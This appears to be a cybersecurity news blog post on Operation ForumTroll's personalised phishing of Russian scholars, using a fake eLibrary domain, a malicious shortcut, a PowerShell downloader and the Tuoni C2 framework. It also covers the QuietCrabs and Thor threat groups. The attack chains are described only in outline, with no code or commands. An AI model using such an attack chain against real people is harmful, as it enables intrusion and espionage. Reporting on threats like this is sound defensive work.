A new wave of phishing attacks has emerged, targeting Russian scholars with a clever and personalized approach. The threat actor, linked to Operation ForumTroll, has set its sights on individuals in the fields of political science, international relations, and global economics. But here's where it gets controversial: these attacks are specifically targeting scholars within major Russian universities and research institutions.
Operation ForumTroll is a sophisticated campaign, exploiting a zero-day vulnerability in Google Chrome to deliver malicious payloads. The attackers have gone to great lengths to create a convincing ruse, using a fake eLibrary email address to lure their victims. The domain, registered months before the campaign began, suggests a well-planned and calculated attack.
The emails instruct targets to download a plagiarism report, but what they're actually downloading is a ZIP archive containing a malicious Windows shortcut. This shortcut, when executed, runs a PowerShell script to download and launch a dangerous payload. The payload then contacts a URL to fetch a final-stage DLL, giving the threat actors remote access to the victim's device.
The final payload, known as Tuoni, is a command-and-control framework that allows the attackers to take full control of the compromised Windows device. And this is the part most people miss: the attackers also carefully personalize the phishing emails, using the victim's name and patronymic to create a sense of familiarity and trust.
ForumTroll has been active since at least 2022, targeting organizations and individuals in Russia and Belarus. With such a lengthy timeline, it's likely that this APT group will continue to pose a significant threat to entities and individuals within these countries.
But the story doesn't end there. As Kaspersky revealed this information, another cybersecurity firm, Positive Technologies, detailed the activities of two other threat clusters: QuietCrabs and Thor. These groups have been leveraging security flaws in various software, including Microsoft SharePoint and Ivanti products, to carry out their attacks.
The QuietCrabs group, suspected to be a Chinese hacking group, uses an ASPX web shell to deliver the KrustyLoader implant, which then drops the Sliver implant. Thor, on the other hand, is a threat group first observed attacking Russian companies in 2025. They use LockBit and Babuk ransomware, as well as Tactical RMM and MeshAgent, to maintain persistence and control over their victims' systems.
This article highlights the ever-evolving nature of cyber threats and the sophisticated tactics employed by threat actors. With each new campaign, we see a blend of old and new techniques, making it crucial for individuals and organizations to stay vigilant and informed.
So, what are your thoughts on these recent developments? Do you think these threat actors will continue to target Russian scholars, or will they shift their focus elsewhere? Share your insights and opinions in the comments below!
